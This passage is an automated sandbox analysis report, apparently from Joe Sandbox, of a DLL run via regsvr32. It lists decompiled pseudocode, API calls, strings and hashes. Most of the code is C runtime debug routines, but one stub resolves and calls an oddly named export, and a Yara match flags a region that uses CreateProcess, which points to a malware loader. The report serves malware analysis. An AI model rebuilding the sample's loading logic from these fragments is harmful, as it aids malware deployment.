                                    • Opcode Fuzzy Hash: 2fea13ac07d8f022f3d86b1cc1b99bf950f7c5081f441752a002fe175989ec87
                                    • Instruction Fuzzy Hash: 8B41A536618B8586E794CB56F84432FB7E1F785B94F200429EBCD47B68DBBED4548B00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 000007FEF9D27540: _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                      • Part of subcall function 000007FEF9D27540: _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                      • Part of subcall function 000007FEF9D28FE0: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000007FEF9D2906F
                                    • FlsAlloc.KERNEL32 ref: 000007FEF9D23D55
                                      • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                      • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AllocCountCriticalFreeInitializeSectionSpin_initp_eh_hooks_initp_misc_winsig_mtdeletelocks
                                    • String ID: f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tidtable.c
                                    • API String ID: 3828364660-3898981997
                                    • Opcode ID: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                    • Instruction ID: b9f7c2a4cabba63d90327ac94b1883ffc0a3f64b25b31a8ae36976c45a874ec4
                                    • Opcode Fuzzy Hash: 3be25d5429145f193b8b5ac72c588d3aab3a3dcc72f716665f31abf408c046fa
                                    • Instruction Fuzzy Hash: 37115E30A2D60286F3E0AB29ED4577DA6E1B784B60F214275E9EE422F5DB2FE4048601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E000007FE7FEF9D2461B(void* __rdx, void* __r8, long long _a32, long long _a40, intOrPtr _a64, long long _a72, void* _a80, intOrPtr _a88, long long _a96, long long _a128, signed int _a136, long long _a144, intOrPtr _a152, void* _a160) {
                                    				signed int _t64;
                                    				intOrPtr _t66;
                                    				void* _t73;
                                    				void* _t92;
                                    				long long _t98;
                                    				long long _t113;
                                    				long long _t114;
                                    				long long _t115;
                                    				long long _t130;
                                    				intOrPtr _t132;
                                    				long long _t135;
                                    
                                    				if (_a136 == 1) goto 0xf9d24672;
                                    				_t64 = _a136 & 0x0000ffff;
                                    				if (_t64 == 2) goto 0xf9d24672;
                                    				if (_a136 == 3) goto 0xf9d24672;
                                    				_a40 = "Error: memory allocation: bad memory block type.\n";
                                    				_a32 = "%s";
                                    				r9d = 0;
                                    				r8d = 0;
                                    				0xf9d2ad00();
                                    				if (_t64 != 1) goto 0xf9d24672;
                                    				asm("int3");
                                    				_t98 = _a128 + 0x34;
                                    				_a96 = _t98;
                                    				0xf9d2ac90(); // executed
                                    				_a80 = _t98;
                                    				if (_a80 != 0) goto 0xf9d246b8;
                                    				if (_a160 == 0) goto 0xf9d246b3;
                                    				 *_a160 = 0xc;
                                    				goto 0xf9d248b4;
                                    				_t66 =  *0xf9d4b03c; // 0x38
                                    				 *0xf9d4b03c = _t66 + 1;
                                    				if (_a64 == 0) goto 0xf9d2472d;
                                    				 *_a80 = 0;
                                    				 *((long long*)(_a80 + 8)) = 0;
                                    				 *((long long*)(_a80 + 0x10)) = 0;
                                    				 *((intOrPtr*)(_a80 + 0x18)) = 0xfedcbabc;
                                    				 *((long long*)(_a80 + 0x20)) = _a128;
                                    				 *(_a80 + 0x1c) = 3;
                                    				 *((intOrPtr*)(_a80 + 0x28)) = 0;
                                    				goto 0xf9d24844;
                                    				if (0xffffffff -  *0xf9d4c960 - _a128 <= 0) goto 0xf9d24763;
                                    				_t130 =  *0xf9d4c960; // 0x42cc
                                    				 *0xf9d4c960 = _t130 + _a128;
                                    				goto 0xf9d2476e;
                                    				 *0xf9d4c960 = 0xffffffff;
                                    				_t132 =  *0xf9d4c990; // 0xa0c
                                    				 *0xf9d4c990 = _t132 + _a128;
                                    				_t113 =  *0xf9d4c978; // 0x32f4
                                    				_t92 =  *0xf9d4c990 - _t113; // 0xa0c
                                    				if (_t92 <= 0) goto 0xf9d247a8;
                                    				_t114 =  *0xf9d4c990; // 0xa0c
                                    				 *0xf9d4c978 = _t114;
                                    				if ( *0xf9d4c980 == 0) goto 0xf9d247c4;
                                    				_t115 =  *0xf9d4c980; // 0x2313b00
                                    				 *((long long*)(_t115 + 8)) = _a80;
                                    				goto 0xf9d247d0;
                                    				 *0xf9d4c968 = _a80;
                                    				_t135 =  *0xf9d4c980; // 0x2313b00
                                    				 *_a80 = _t135;
                                    				 *((long long*)(_a80 + 8)) = 0;
                                    				 *((long long*)(_a80 + 0x10)) = _a144;
                                    				 *((intOrPtr*)(_a80 + 0x18)) = _a152;
                                    				 *((long long*)(_a80 + 0x20)) = _a128;
                                    				 *(_a80 + 0x1c) = _a136;
                                    				_t78 = _a88;
                                    				 *((intOrPtr*)(_a80 + 0x28)) = _a88;
                                    				 *0xf9d4c980 = _a80;
                                    				r8d = 4;
                                    				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + 0x2c, __rdx, __r8);
                                    				_t145 = _a128;
                                    				r8d = 4;
                                    				E000007FE7FEF9D232B0( *0xf9d4b04c & 0x000000ff, _a88,  *0xf9d4b04c & 0x000000ff, _a80 + _a128 + 0x30, _a128, __r8);
                                    				_t73 = E000007FE7FEF9D232B0( *0xf9d4b04f & 0x000000ff, _t78,  *0xf9d4b04f & 0x000000ff, _a80 + 0x30, _t145, _a128);
                                    				_a72 = _a80 + 0x30;
                                    				return E000007FE7FEF9D29360(_t73, 4);
                                    			}















                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _unlock
                                    • String ID: Error: memory allocation: bad memory block type.
                                    • API String ID: 2480363372-1537269110
                                    • Opcode ID: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                    • Instruction ID: 5caffd3b8bb6e9a751bf86ff06ba01468230100948e3856d22c691b184e429db
                                    • Opcode Fuzzy Hash: 070c00f70d4df6f813f84e43e5590717d4ebcb6a3ae1d4e5f47ac26a0ae5b61c
                                    • Instruction Fuzzy Hash: 6B71EB36A09B8586DBA0CB59E89036EB7E0F3C9B90F218526DADD437A4DF7DD044CB40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer_initterm_e
                                    • String ID: Y
                                    • API String ID: 1618838664-1754117475
                                    • Opcode ID: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                    • Instruction ID: e2eda9ea6841371ef03f52dec0317b7f8d7542193ab5d09d46fee122be74aa2a
                                    • Opcode Fuzzy Hash: 24d3616295d43623420cef2980f0f4d1896d7dbbaf9113ec39dfe7d3f9684184
                                    • Instruction Fuzzy Hash: 1DE0C22190C042A7FAA1AB24ED453BE63E0B791344FA14231E2CD824B5EB2FF908CB11
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E000007FE7FEF9D23110(void* __eflags, long long* __rax) {
                                    				void* _t7;
                                    				intOrPtr _t8;
                                    				void* _t10;
                                    
                                    				_t8 =  *0xf9d4c3c8; // 0x180000000
                                    				E000007FE7FEF9D211E0(_t7, _t8, "H82WX82viYR", _t10); // executed
                                    				 *__rax(); // executed
                                    				return 0;
                                    			}






                                    0x7fef9d23114
                                    0x7fef9d23122
                                    0x7fef9d23127
                                    0x7fef9d2312f

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExitProcessUser
                                    • String ID: H82WX82viYR
                                    • API String ID: 3902816426-3887106525
                                    • Opcode ID: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                    • Instruction ID: 3c31bc9bae0aa088b32ec31719daf081635377c5f01f1f7dd7abf53af6b9f495
                                    • Opcode Fuzzy Hash: 9520d05ee5257cfcb6870757d168f5deeb70c535bf89830e30f839e103e3a1eb
                                    • Instruction Fuzzy Hash: 0DC04C11F2550381EA4467E6AC861AC12A16785790FA19421D55C86231DE6E92964B02
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 62%
                                    			E000007FE7FEF9D27540(long long __rax) {
                                    				long long _v24;
                                    				void* _t8;
                                    				void* _t9;
                                    
                                    				_t16 = __rax;
                                    				_t9 = E000007FE7FEF9D23D00(_t8); // executed
                                    				_v24 = __rax;
                                    				return E000007FE7FEF9D2CF20(E000007FE7FEF9D2CFB0(E000007FE7FEF9D2D450(E000007FE7FEF9D2D470(E000007FE7FEF9D2BD50(E000007FE7FEF9D2AB90(_t9, _v24), _v24), _v24), _v24), _v24), _t16, _v24);
                                    			}






                                    0x7fef9d27540
                                    0x7fef9d27544
                                    0x7fef9d27549
                                    0x7fef9d2758e

                                    APIs
                                      • Part of subcall function 000007FEF9D23D00: RtlEncodePointer.NTDLL ref: 000007FEF9D23D06
                                    • _initp_misc_winsig.LIBCMTD ref: 000007FEF9D2757B
                                    • _initp_eh_hooks.LIBCMTD ref: 000007FEF9D27585
                                      • Part of subcall function 000007FEF9D2CF20: EncodePointer.KERNEL32(?,?,?,?,000007FEF9D2758A,?,?,?,?,?,?,000007FEF9D23D39), ref: 000007FEF9D2CF30
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer$_initp_eh_hooks_initp_misc_winsig
                                    • String ID:
                                    • API String ID: 2678799220-0
                                    • Opcode ID: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                    • Instruction ID: d1131ca10be328b200f0d94da683d71e83c9d45f094ccb2362bb8b9ac37f618d
                                    • Opcode Fuzzy Hash: abe4bcf42024140c0e82e0fb2c3eff25659a698c9099ae3cd415aa6bcc21eafa
                                    • Instruction Fuzzy Hash: CFE07D6391D58181E6B0BB21EC5226E93B0F7C8788F610171B6CD47A7BCE1DE9018B80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ExitProcess$AllocateHeap__crt
                                    • String ID:
                                    • API String ID: 4215626177-0
                                    • Opcode ID: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                    • Instruction ID: 018cd22ed3aaffe80bc67b356604b0c029bcf26b5d2cff022e0890546f5cf117
                                    • Opcode Fuzzy Hash: 77cc9cc60f8eca6ccffa51c036cc335ce9466cc401fd995fa093edd43c12ab32
                                    • Instruction Fuzzy Hash: AFE04F2490898683E7A49726E80037D63E0FB84348F614036D7CE026F5CF2FE840E601
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917541181.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                    • Instruction ID: 2da17281d2a08d1ac9b8a996dbaf27e8716b5e9a88d25284efbd0f172fd1731a
                                    • Opcode Fuzzy Hash: 04cf030d77e645320339c33741cb4d53f5c8d6a2e25ff01d0d4939bc2732d238
                                    • Instruction Fuzzy Hash: 7041417051CB848FDBB8DF18E48979AB7E0FB88314F104A5DE48EC7245DB749885CB86
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E000007FE7FEF9D24399(long long __rax, long long _a48, intOrPtr _a80, intOrPtr _a88, void* _a120) {
                                    
                                    				_a48 = __rax;
                                    				if (_a48 == 0) goto 0xf9d243ad;
                                    				goto 0xf9d243f5;
                                    				if (_a88 != 0) goto 0xf9d243ce;
                                    				if (_a120 == 0) goto 0xf9d243c7;
                                    				 *_a120 = 0xc;
                                    				goto 0xf9d243f5;
                                    				if (E000007FE7FEF9D2ABB0(_a48, _a80) != 0) goto 0xf9d243f3;
                                    				if (_a120 == 0) goto 0xf9d243ef;
                                    				 *_a120 = 0xc;
                                    				goto 0xf9d243f5;
                                    				goto 0xf9d24377;
                                    				return 0;
                                    			}




                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                    • Instruction ID: 1adc9abf0de1c3ca8893cd90e215b0d97e51771cadcbd8eff06287440f46b9d2
                                    • Opcode Fuzzy Hash: 1ac0a5da81333129a8f229358abc3f3628bfe7ae3225332448e9bf5308d83ad5
                                    • Instruction Fuzzy Hash: 8B01B332A5CB41C6F7A08A55E84472EA7E0F7C4794F321121AECD42BB8CB7DE440CA00
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _ioterm
                                    • String ID:
                                    • API String ID: 4163092671-0
                                    • Opcode ID: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                    • Instruction ID: 7377a742d64af20529275359c4a94eabcf7c0d21081332a84b693dd33c507e1a
                                    • Opcode Fuzzy Hash: ccd1307e9d50970cca75b27b642d85769dad3e23086d7af9cb1c5234e8638c27
                                    • Instruction Fuzzy Hash: F4F03720C0C10789FAE16778AC0A37CA1D1A711B91F3252F5A0DC821F2D77FB54A8A12
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • _ioterm.LIBCMTD ref: 000007FEF9D23437
                                      • Part of subcall function 000007FEF9D27D00: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000007FEF9D2343C), ref: 000007FEF9D27D93
                                      • Part of subcall function 000007FEF9D23E00: FlsFree.KERNEL32 ref: 000007FEF9D23E13
                                      • Part of subcall function 000007FEF9D23E00: _mtdeletelocks.LIBCMTD ref: 000007FEF9D23E23
                                      • Part of subcall function 000007FEF9D288D0: HeapDestroy.KERNELBASE ref: 000007FEF9D288DB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CriticalDeleteDestroyFreeHeapSection_ioterm_mtdeletelocks
                                    • String ID:
                                    • API String ID: 1508997487-0
                                    • Opcode ID: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                    • Instruction ID: 18d5f63124407e78997e2f664e67049843f9c9ac3d7a6681d0ffcba3130af5de
                                    • Opcode Fuzzy Hash: bdb7225874b5496ab185c850c138daf46d614203cfe4a73cb1b8596e23d721ba
                                    • Instruction Fuzzy Hash: 50E06760E0C1439AF6D567B46C423BD91D06B54BC1FB245B2A1CE862F3EA5FB8014662
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: DestroyHeap
                                    • String ID:
                                    • API String ID: 2435110975-0
                                    • Opcode ID: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                    • Instruction ID: df5636f5ee55eb5a1123ad47329e94e2a1af4504a4e9b44811c9c5941fd1bffd
                                    • Opcode Fuzzy Hash: f7b981f9b1b51933cf7e1d9a1baddea90378982ce7575ce50583c327d4fc7a8e
                                    • Instruction Fuzzy Hash: 6CC04C64D15A01C1EA445726FC8536822A06394745FA0C021C5CD012308B2F55968701
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: EncodePointer
                                    • String ID:
                                    • API String ID: 2118026453-0
                                    • Opcode ID: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                    • Instruction ID: 5c830059afc01ab3dffeb0f702370a5898bb96dd38ab511ff450623a486f5942
                                    • Opcode Fuzzy Hash: 486166b47cec33101184f167bfa082c8d21519f5c79393c344b51e77eb7d9bd4
                                    • Instruction Fuzzy Hash: F1A00224F16591D7DAAC373A5D9713D11A06B68709FF05869C74F40261CE2F92FE8B05
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: _invoke_watson_if_error$DebugOutputString$_invoke_watson_if_oneof$_itow_s_snwprintf_s_unlock_wcsftime_l
                                    • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $P$Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportW$_itow_s(nLine, szLineMessage, 4096, 10)$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcpy_s(szOutMessage2, 4096, "_CrtDbgReport: String too long or Invalid characters in String")$wcscat_s(szLineMessage, 4096, L"\n")$wcscat_s(szLineMessage, 4096, L"\r")$wcscat_s(szLineMessage, 4096, szUserMessage)$wcscpy_s(szLineMessage, 4096, szFormat ? L"Assertion failed: " : L"Assertion failed!")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcscpy_s(szUserMessage, 4096, L"_CrtDbgReport: String too long or IO Error")$wcstombs_s(&ret, szaOutMessage, 4096, szOutMessage, ((size_t)-1))$wcstombs_s(((void *)0), szOutMessage2, 4096, szOutMessage, ((size_t)-1))
                                    • API String ID: 4197005980-4190456261
                                    • Opcode ID: 91caf2df9a40c10ca931429e5e540051a4e8143577a7dc19426bf0d901356392
                                    • Instruction ID: 4be8715b722ea95f30444376ecaecfb3c385eb747484933fb25f7726159d970d
                                    • Opcode Fuzzy Hash: 91caf2df9a40c10ca931429e5e540051a4e8143577a7dc19426bf0d901356392
                                    • Instruction Fuzzy Hash: 5C422C31A0CA8691E7B0CB14E8547EE73E4F784345FA08226D6CD43AA9DF7EE549CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Pointer$Decode$AddressEncodeLibraryLoadProc
                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                    • API String ID: 2256938910-232180764
                                    • Opcode ID: 4136024d25ab454011a9418e3e33b4ea31b56a31dc25d7fc48a91c666a4aba5f
                                    • Instruction ID: 2fdcab7defb259cab3e0ae5c8194edaf0e6743a208e28eb4b7718d98c4970bd2
                                    • Opcode Fuzzy Hash: 4136024d25ab454011a9418e3e33b4ea31b56a31dc25d7fc48a91c666a4aba5f
                                    • Instruction Fuzzy Hash: F581C531A09B8686E7A09B19FC4436EB3E0F784795F608135DACE42678DF7EE448CB41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.917585248.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                    • Associated: 00000003.00000002.917582785.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917601106.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917607068.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000003.00000002.917614005.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Client hook re-allocation failure at file %hs line %d.$Client hook re-allocation failure.$Error: memory allocation: bad memory block type.$Error: memory allocation: bad memory block type.Memory allocated at %hs(%d).$Error: possible heap corruption at or near 0x%p$Invalid allocation size: %Iu bytes.$Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).$The Block at 0x%p was allocated by aligned routines, use _aligned_realloc()$_CrtCheckMemory()$_CrtIsValidHeapPointer(pUserData)$_pFirstBlock == pOldBlock$_pLastBlock == pOldBlock$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgheap.c$fRealloc || (!fRealloc && pNewBlock == pOldBlock)$pOldBlock->nLine == IGNORE_LINE && pOldBlock->lRequest == IGNORE_REQ
                                    • API String ID: 0-1181733849
                                    • Opcode ID: caf568ba67e02e981cee0a62def33bb5426de77b0166e0249518d1aed8fc28ed
                                    • Instruction ID: 672275d76b56a31b76a57beb3bef09bdc1cc68057209de26ab42cab730db0c01
                                    • Opcode Fuzzy Hash: caf568ba67e02e981cee0a62def33bb5426de77b0166e0249518d1aed8fc28ed
